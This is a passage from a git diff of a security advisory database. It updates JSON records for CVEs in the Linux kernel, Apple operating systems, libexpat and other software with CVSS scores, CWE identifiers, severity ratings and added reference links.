mount was requested.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-668" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T10:15:07Z" diff --git a/advisories/unreviewed/2024/02/GHSA-fvr5-4qp7-xwjc/GHSA-fvr5-4qp7-xwjc.json b/advisories/unreviewed/2024/02/GHSA-fvr5-4qp7-xwjc/GHSA-fvr5-4qp7-xwjc.json index 5387d7fbdcf..5057f480032 100644 --- a/advisories/unreviewed/2024/02/GHSA-fvr5-4qp7-xwjc/GHSA-fvr5-4qp7-xwjc.json +++ b/advisories/unreviewed/2024/02/GHSA-fvr5-4qp7-xwjc/GHSA-fvr5-4qp7-xwjc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fvr5-4qp7-xwjc", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46919" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix wq size store permission state\n\nWQ size can only be changed when the device is disabled. Current code\nallows change when device is enabled but wq is disabled. Change the check\nto detect device state.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:08Z" diff --git a/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json b/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json index 7c1062bfbf6..db9bddf39e7 100644 --- a/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json +++ b/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gh68-jm46-84rf", - "modified": "2024-02-26T18:30:27Z", + "modified": "2024-04-09T06:30:44Z", "published": "2024-02-04T21:30:43Z", "aliases": [ "CVE-2023-52425" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://github.com/libexpat/libexpat/pull/789" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00006.html" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNRIHC7DVVRAIWFRGV23Y6UZXFBXSQDB" diff --git a/advisories/unreviewed/2024/02/GHSA-j3g9-72cw-7wcp/GHSA-j3g9-72cw-7wcp.json b/advisories/unreviewed/2024/02/GHSA-j3g9-72cw-7wcp/GHSA-j3g9-72cw-7wcp.json index 9211036bebe..5ead70a8fa0 100644 --- a/advisories/unreviewed/2024/02/GHSA-j3g9-72cw-7wcp/GHSA-j3g9-72cw-7wcp.json +++ b/advisories/unreviewed/2024/02/GHSA-j3g9-72cw-7wcp/GHSA-j3g9-72cw-7wcp.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j3g9-72cw-7wcp", - "modified": "2024-02-27T12:31:09Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-02-27T12:31:09Z", "aliases": [ "CVE-2021-46925" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: fix kernel panic caused by race of smc_sock\n\nA crash occurs when smc_cdc_tx_handler() tries to access smc_sock\nbut smc_release() has already freed it.\n\n[ 4570.695099] BUG: unable to handle page fault for address: 000000002eae9e88\n[ 4570.696048] #PF: supervisor write access in kernel mode\n[ 4570.696728] #PF: error_code(0x0002) - not-present page\n[ 4570.697401] PGD 0 P4D 0\n[ 4570.697716] Oops: 0002 [#1] PREEMPT SMP NOPTI\n[ 4570.698228] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.16.0-rc4+ #111\n[ 4570.699013] Hardware name: Alibaba Cloud Alibaba Cloud ECS, BIOS 8c24b4c 04/0\n[ 4570.699933] RIP: 0010:_raw_spin_lock+0x1a/0x30\n<...>\n[ 4570.711446] Call Trace:\n[ 4570.711746] \n[ 4570.711992] smc_cdc_tx_handler+0x41/0xc0\n[ 4570.712470] smc_wr_tx_tasklet_fn+0x213/0x560\n[ 4570.712981] ? smc_cdc_tx_dismisser+0x10/0x10\n[ 4570.713489] tasklet_action_common.isra.17+0x66/0x140\n[ 4570.714083] __do_softirq+0x123/0x2f4\n[ 4570.714521] irq_exit_rcu+0xc4/0xf0\n[ 4570.714934] common_interrupt+0xba/0xe0\n\nThough smc_cdc_tx_handler() checked the existence of smc connection,\nsmc_release() may have already dismissed and released the smc socket\nbefore smc_cdc_tx_handler() further visits it.\n\nsmc_cdc_tx_handler() |smc_release()\nif (!conn) |\n |\n |smc_cdc_tx_dismiss_slots()\n | smc_cdc_tx_dismisser()\n |\n |sock_put(&smc->sk) <- last sock_put,\n | smc_sock freed\nbh_lock_sock(&smc->sk) (panic) |\n\nTo make sure we won't receive any CDC messages after we free the\nsmc_sock, add a refcount on the smc_connection for inflight CDC\nmessage(posted to the QP but haven't received related CQE), and\ndon't release the smc_connection until all the inflight CDC messages\nhaven been done, for both success or failed ones.\n\nUsing refcount on CDC messages brings another problem: when the link\nis going to be destroyed, smcr_link_clear() will reset the QP, which\nthen remove all the pending CQEs related to the QP in the CQ. To make\nsure all the CQEs will always come back so the refcount on the\nsmc_connection can always reach 0, smc_ib_modify_qp_reset() was replaced\nby smc_ib_modify_qp_error().\nAnd remove the timeout in smc_wr_tx_wait_no_pending_sends() since we\nneed to wait for all pending WQEs done, or we may encounter use-after-\nfree when handling CQEs.\n\nFor IB device removal routine, we need to wait for all the QPs on that\ndevice been destroyed before we can destroy CQs on the device, or\nthe refcount on smc_connection won't reach 0 and smc_sock cannot be\nreleased.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-362" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T10:15:07Z" diff --git a/advisories/unreviewed/2024/02/GHSA-jpmx-v3pp-6rp5/GHSA-jpmx-v3pp-6rp5.json b/advisories/unreviewed/2024/02/GHSA-jpmx-v3pp-6rp5/GHSA-jpmx-v3pp-6rp5.json index b1864d6305a..3ad8b346a79 100644 --- a/advisories/unreviewed/2024/02/GHSA-jpmx-v3pp-6rp5/GHSA-jpmx-v3pp-6rp5.json +++ b/advisories/unreviewed/2024/02/GHSA-jpmx-v3pp-6rp5/GHSA-jpmx-v3pp-6rp5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jpmx-v3pp-6rp5", - "modified": "2024-02-27T15:30:30Z", + "modified": "2024-04-09T09:31:10Z", "published": "2024-02-27T15:30:30Z", "aliases": [ "CVE-2024-1918" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.254839" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.284382" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/02/GHSA-p23g-c2fc-p76q/GHSA-p23g-c2fc-p76q.json b/advisories/unreviewed/2024/02/GHSA-p23g-c2fc-p76q/GHSA-p23g-c2fc-p76q.json index 1824690913e..89850f05890 100644 --- a/advisories/unreviewed/2024/02/GHSA-p23g-c2fc-p76q/GHSA-p23g-c2fc-p76q.json +++ b/advisories/unreviewed/2024/02/GHSA-p23g-c2fc-p76q/GHSA-p23g-c2fc-p76q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p23g-c2fc-p76q", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46920" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: Fix clobbering of SWERR overflow bit on writeback\n\nCurrent code blindly writes over the SWERR and the OVERFLOW bits. Write\nback the bits actually read instead so the driver avoids clobbering the\nOVERFLOW bit that comes after the register is read.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:08Z" diff --git a/advisories/unreviewed/2024/02/GHSA-r4hf-7fhj-q7fq/GHSA-r4hf-7fhj-q7fq.json b/advisories/unreviewed/2024/02/GHSA-r4hf-7fhj-q7fq/GHSA-r4hf-7fhj-q7fq.json index b81114e5495..6897925c43b 100644 --- a/advisories/unreviewed/2024/02/GHSA-r4hf-7fhj-q7fq/GHSA-r4hf-7fhj-q7fq.json +++ b/advisories/unreviewed/2024/02/GHSA-r4hf-7fhj-q7fq/GHSA-r4hf-7fhj-q7fq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r4hf-7fhj-q7fq", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:31Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46914" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nixgbe: fix unbalanced device enable/disable in suspend/resume\n\npci_disable_device() called in __ixgbe_shutdown() decreases\ndev->enable_cnt by 1. pci_enable_device_mem() which increases\ndev->enable_cnt by 1, was removed from ixgbe_resume() in commit\n6f82b2558735 (\"ixgbe: use generic power management\"). This caused\nunbalanced increase/decrease. So add pci_enable_device_mem() back.\n\nFix the following call trace.\n\n ixgbe 0000:17:00.1: disabling already-disabled device\n Call Trace:\n __ixgbe_shutdown+0x10a/0x1e0 [ixgbe]\n ixgbe_suspend+0x32/0x70 [ixgbe]\n pci_pm_suspend+0x87/0x160\n ? pci_pm_freeze+0xd0/0xd0\n dpm_run_callback+0x42/0x170\n __device_suspend+0x114/0x460\n async_suspend+0x1f/0xa0\n async_run_entry_fn+0x3c/0xf0\n process_one_work+0x1dd/0x410\n worker_thread+0x34/0x3f0\n ? cancel_delayed_work+0x90/0x90\n kthread+0x14c/0x170\n ? kthread_park+0x90/0x90\n ret_from_fork+0x1f/0x30", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:07Z" diff --git a/advisories/unreviewed/2024/02/GHSA-v75j-9fr8-x3rq/GHSA-v75j-9fr8-x3rq.json b/advisories/unreviewed/2024/02/GHSA-v75j-9fr8-x3rq/GHSA-v75j-9fr8-x3rq.json index 2669c184811..10c7acc1988 100644 --- a/advisories/unreviewed/2024/02/GHSA-v75j-9fr8-x3rq/GHSA-v75j-9fr8-x3rq.json +++ b/advisories/unreviewed/2024/02/GHSA-v75j-9fr8-x3rq/GHSA-v75j-9fr8-x3rq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-v75j-9fr8-x3rq", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:31Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46911" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nch_ktls: Fix kernel panic\n\nTaking page refcount is not ideal and causes kernel panic\nsometimes. It's better to take tx_ctx lock for the complete\nskb transmit, to avoid page cleanup if ACK received in middle.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:07Z" diff --git a/advisories/unreviewed/2024/02/GHSA-wp68-xh4w-r326/GHSA-wp68-xh4w-r326.json b/advisories/unreviewed/2024/02/GHSA-wp68-xh4w-r326/GHSA-wp68-xh4w-r326.json index 8774589037f..f47750f8981 100644 --- a/advisories/unreviewed/2024/02/GHSA-wp68-xh4w-r326/GHSA-wp68-xh4w-r326.json +++ b/advisories/unreviewed/2024/02/GHSA-wp68-xh4w-r326/GHSA-wp68-xh4w-r326.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wp68-xh4w-r326", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:31Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46918" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: clear MSIX permission entry on shutdown\n\nAdd disabling/clearing of MSIX permission entries on device shutdown to\nmirror the enabling of the MSIX entries on probe. Current code left the\nMSIX enabled and the pasid entries still programmed at device shutdown.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-3x6c-xfwc-qp7m/GHSA-3x6c-xfwc-qp7m.json b/advisories/unreviewed/2024/03/GHSA-3x6c-xfwc-qp7m/GHSA-3x6c-xfwc-qp7m.json index c1b55cdb3af..9980b7c9021 100644 --- a/advisories/unreviewed/2024/03/GHSA-3x6c-xfwc-qp7m/GHSA-3x6c-xfwc-qp7m.json +++ b/advisories/unreviewed/2024/03/GHSA-3x6c-xfwc-qp7m/GHSA-3x6c-xfwc-qp7m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3x6c-xfwc-qp7m", - "modified": "2024-03-29T18:30:42Z", + "modified": "2024-04-05T18:30:33Z", "published": "2024-03-29T18:30:42Z", "aliases": [ "CVE-2023-49234" @@ -29,6 +29,10 @@ { "type": "WEB", "url": "https://www.visual-planning.com/en/support-portal/updates" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Apr/3" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/03/GHSA-6cvp-282g-6jp8/GHSA-6cvp-282g-6jp8.json b/advisories/unreviewed/2024/03/GHSA-6cvp-282g-6jp8/GHSA-6cvp-282g-6jp8.json index 6caa4a99590..e6611df474b 100644 --- a/advisories/unreviewed/2024/03/GHSA-6cvp-282g-6jp8/GHSA-6cvp-282g-6jp8.json +++ b/advisories/unreviewed/2024/03/GHSA-6cvp-282g-6jp8/GHSA-6cvp-282g-6jp8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6cvp-282g-6jp8", - "modified": "2024-03-28T18:30:47Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:47Z", "aliases": [ "CVE-2023-42950" ], "details": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 17.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2, watchOS 10.2, macOS Sonoma 14.2. Processing maliciously crafted web content may lead to arbitrary code execution.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -43,7 +46,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-6q5p-rp5c-wmph/GHSA-6q5p-rp5c-wmph.json b/advisories/unreviewed/2024/03/GHSA-6q5p-rp5c-wmph/GHSA-6q5p-rp5c-wmph.json index b7b19a57a6e..56c5d9a1927 100644 --- a/advisories/unreviewed/2024/03/GHSA-6q5p-rp5c-wmph/GHSA-6q5p-rp5c-wmph.json +++ b/advisories/unreviewed/2024/03/GHSA-6q5p-rp5c-wmph/GHSA-6q5p-rp5c-wmph.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6q5p-rp5c-wmph", - "modified": "2024-03-07T03:30:40Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-03-07T03:30:40Z", "aliases": [ "CVE-2024-22857" @@ -18,6 +18,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22857" }, + { + "type": "WEB", + "url": "https://github.com/HardySimpson/zlog/pull/251" + }, { "type": "WEB", "url": "https://github.com/HardySimpson/zlog" diff --git a/advisories/unreviewed/2024/03/GHSA-77m3-8vw3-fw8w/GHSA-77m3-8vw3-fw8w.json b/advisories/unreviewed/2024/03/GHSA-77m3-8vw3-fw8w/GHSA-77m3-8vw3-fw8w.json index 7d7b586ce38..6a57dae048b 100644 --- a/advisories/unreviewed/2024/03/GHSA-77m3-8vw3-fw8w/GHSA-77m3-8vw3-fw8w.json +++ b/advisories/unreviewed/2024/03/GHSA-77m3-8vw3-fw8w/GHSA-77m3-8vw3-fw8w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-77m3-8vw3-fw8w", - "modified": "2024-03-28T18:30:46Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:46Z", "aliases": [ "CVE-2023-42930" ], "details": "This issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. An app may be able to modify protected parts of the file system.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-79wp-fmwh-x929/GHSA-79wp-fmwh-x929.json b/advisories/unreviewed/2024/03/GHSA-79wp-fmwh-x929/GHSA-79wp-fmwh-x929.json index f33167ad8ae..e256c898d9b 100644 --- a/advisories/unreviewed/2024/03/GHSA-79wp-fmwh-x929/GHSA-79wp-fmwh-x929.json +++ b/advisories/unreviewed/2024/03/GHSA-79wp-fmwh-x929/GHSA-79wp-fmwh-x929.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-79wp-fmwh-x929", - "modified": "2024-04-03T15:30:41Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-03-21T12:31:56Z", "aliases": [ "CVE-2024-26642" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/72c1efe3f247a581667b7d368fff3bd9a03cd57a" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/8e07c16695583a66e81f67ce4c46e94dece47ba7" diff --git a/advisories/unreviewed/2024/03/GHSA-836c-4296-hwvw/GHSA-836c-4296-hwvw.json b/advisories/unreviewed/2024/03/GHSA-836c-4296-hwvw/GHSA-836c-4296-hwvw.json index 8d926fc8bbf..c94dd7ceee4 100644 --- a/advisories/unreviewed/2024/03/GHSA-836c-4296-hwvw/GHSA-836c-4296-hwvw.json +++ b/advisories/unreviewed/2024/03/GHSA-836c-4296-hwvw/GHSA-836c-4296-hwvw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-836c-4296-hwvw", - "modified": "2024-03-18T03:30:32Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-18T03:30:32Z", "aliases": [ "CVE-2022-47037" ], "details": "Siklu TG Terragraph devices before 2.1.1 allow attackers to discover valid, randomly generated credentials via GetCredentials.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-522" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-18T03:15:06Z" diff --git a/advisories/unreviewed/2024/03/GHSA-857w-h46r-9g9g/GHSA-857w-h46r-9g9g.json b/advisories/unreviewed/2024/03/GHSA-857w-h46r-9g9g/GHSA-857w-h46r-9g9g.json index 4007f49d63d..f36665aba9c 100644 --- a/advisories/unreviewed/2024/03/GHSA-857w-h46r-9g9g/GHSA-857w-h46r-9g9g.json +++ b/advisories/unreviewed/2024/03/GHSA-857w-h46r-9g9g/GHSA-857w-h46r-9g9g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-857w-h46r-9g9g", - "modified": "2024-03-11T18:31:09Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-03-11T18:31:08Z", "aliases": [ "CVE-2023-52488" @@ -33,6 +33,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/dbf4ab821804df071c8b566d9813083125e6d97b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e635f652696ef6f1230621cfd89c350cb5ec6169" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/03/GHSA-948m-5vcf-j8g5/GHSA-948m-5vcf-j8g5.json b/advisories/unreviewed/2024/03/GHSA-948m-5vcf-j8g5/GHSA-948m-5vcf-j8g5.json index 7d0599e5551..521b456fe25 100644 --- a/advisories/unreviewed/2024/03/GHSA-948m-5vcf-j8g5/GHSA-948m-5vcf-j8g5.json +++ b/advisories/unreviewed/2024/03/GHSA-948m-5vcf-j8g5/GHSA-948m-5vcf-j8g5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-948m-5vcf-j8g5", - "modified": "2024-03-28T18:30:47Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:47Z", "aliases": [ "CVE-2023-42947" ], "details": "A path handling issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.2 and iPadOS 17.2, tvOS 17.2, watchOS 10.2, macOS Sonoma 14.2. An app may be able to break out of its sandbox.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } ], "affected": [ @@ -47,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-fh7f-4794-fgr3/GHSA-fh7f-4794-fgr3.json b/advisories/unreviewed/2024/03/GHSA-fh7f-4794-fgr3/GHSA-fh7f-4794-fgr3.json index 5c6e363300c..e974fe86cf4 100644 --- a/advisories/unreviewed/2024/03/GHSA-fh7f-4794-fgr3/GHSA-fh7f-4794-fgr3.json +++ b/advisories/unreviewed/2024/03/GHSA-fh7f-4794-fgr3/GHSA-fh7f-4794-fgr3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fh7f-4794-fgr3", - "modified": "2024-03-28T18:30:46Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:46Z", "aliases": [ "CVE-2023-42913" ], "details": "This issue was addressed through improved state management. This issue is fixed in macOS Sonoma 14.2. Remote Login sessions may be able to obtain full disk access permissions.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-gj62-r5fm-pg3q/GHSA-gj62-r5fm-pg3q.json b/advisories/unreviewed/2024/03/GHSA-gj62-r5fm-pg3q/GHSA-gj62-r5fm-pg3q.json index e5224e19d6f..0d2c44799f8 100644 --- a/advisories/unreviewed/2024/03/GHSA-gj62-r5fm-pg3q/GHSA-gj62-r5fm-pg3q.json +++ b/advisories/unreviewed/2024/03/GHSA-gj62-r5fm-pg3q/GHSA-gj62-r5fm-pg3q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gj62-r5fm-pg3q", - "modified": "2024-03-29T09:30:43Z", + "modified": "2024-04-05T21:32:42Z", "published": "2024-03-29T09:30:43Z", "aliases": [ "CVE-2024-2280" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2280" }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3060565%40better-elementor-addons&new=3060565%40better-elementor-addons&sfp_email=&sfph_mail=" + }, { "type": "WEB", "url": "https://wordpress.org/plugins/better-elementor-addons/#developers" diff --git a/advisories/unreviewed/2024/03/GHSA-h64q-p2cr-jmw7/GHSA-h64q-p2cr-jmw7.json b/advisories/unreviewed/2024/03/GHSA-h64q-p2cr-jmw7/GHSA-h64q-p2cr-jmw7.json index e5ba09a3fa6..84f6f0b0157 100644 --- a/advisories/unreviewed/2024/03/GHSA-h64q-p2cr-jmw7/GHSA-h64q-p2cr-jmw7.json +++ b/advisories/unreviewed/2024/03/GHSA-h64q-p2cr-jmw7/GHSA-h64q-p2cr-jmw7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h64q-p2cr-jmw7", - "modified": "2024-03-28T18:30:47Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:47Z", "aliases": [ "CVE-2023-42962" ], "details": "This issue was addressed with improved checks This issue is fixed in iOS 17.2 and iPadOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. A remote attacker may be able to cause a denial-of-service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-jg48-xvhq-mrmw/GHSA-jg48-xvhq-mrmw.json b/advisories/unreviewed/2024/03/GHSA-jg48-xvhq-mrmw/GHSA-jg48-xvhq-mrmw.json index 2a44cf0de63..9b378824839 100644 --- a/advisories/unreviewed/2024/03/GHSA-jg48-xvhq-mrmw/GHSA-jg48-xvhq-mrmw.json +++ b/advisories/unreviewed/2024/03/GHSA-jg48-xvhq-mrmw/GHSA-jg48-xvhq-mrmw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jg48-xvhq-mrmw", - "modified": "2024-03-28T18:30:47Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:47Z", "aliases": [ "CVE-2023-42936" ], "details": "This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.2 and iPadOS 17.2, tvOS 17.2, watchOS 10.2, macOS Sonoma 14.2. An app may be able to access user-sensitive data.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -47,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-jprr-pf4r-gvp5/GHSA-jprr-pf4r-gvp5.json b/advisories/unreviewed/2024/03/GHSA-jprr-pf4r-gvp5/GHSA-jprr-pf4r-gvp5.json index a33593c6e12..42c079c7caa 100644 --- a/advisories/unreviewed/2024/03/GHSA-jprr-pf4r-gvp5/GHSA-jprr-pf4r-gvp5.json +++ b/advisories/unreviewed/2024/03/GHSA-jprr-pf4r-gvp5/GHSA-jprr-pf4r-gvp5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jprr-pf4r-gvp5", - "modified": "2024-03-28T18:30:47Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:47Z", "aliases": [ "CVE-2023-42956" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, iOS 17.2 and iPadOS 17.2, macOS Sonoma 14.2. Processing web content may lead to a denial-of-service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-mqr3-mxfg-8rw7/GHSA-mqr3-mxfg-8rw7.json b/advisories/unreviewed/2024/03/GHSA-mqr3-mxfg-8rw7/GHSA-mqr3-mxfg-8rw7.json index 98be0d987ce..65f7def0325 100644 --- 